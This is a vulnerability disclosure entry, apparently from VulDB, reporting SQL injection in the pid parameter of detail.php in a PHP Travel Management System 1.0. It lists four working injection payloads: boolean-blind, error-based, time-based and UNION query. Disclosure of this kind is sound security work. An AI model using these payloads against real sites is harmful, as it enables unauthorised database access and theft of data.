| Title | code-projects Travel Management System Using PHP 1.0 SQL Injection |
|---|
| Description | In the file detail.php located at /travel/detail.php?pid=, there is a possibility of performing SQL injection on the pid parameter. This allows attackers to inject malicious SQL code into the query. For example, if the pid parameter is set to:
For boolean-based blind:
pid=1' AND 6822=6822 AND 'jSNM'='jSNM
For error-based:
pid=1' AND (SELECT 9966 FROM(SELECT COUNT(*),CONCAT(0x7162627671,(SELECT (ELT(9966=9966,1))),0x71626a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iCmS'='iCmS
For time-based blind:
pid=1' AND (SELECT 8620 FROM (SELECT(SLEEP(5)))WSrt) AND 'nOlC'='nOlC
For UNION query:
pid=-5731' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627671,0x6d664767455468646d727a4c7946534256474544714d565850497154764f714378686a42494e5755,0x71626a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| Source | ⚠️ https://code-projects.org/travel-management-system-using-php-source-code/ |
|---|
| User | Havook (UID 71104) |
|---|
| Submission | 12/24/2024 17:52 (1 Year ago) |
|---|
| Moderation | 12/25/2024 19:11 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 289311 [code-projects Travel Management System 1.0 /detail.php pid sql injection] |
|---|
| Points | 20 |
|---|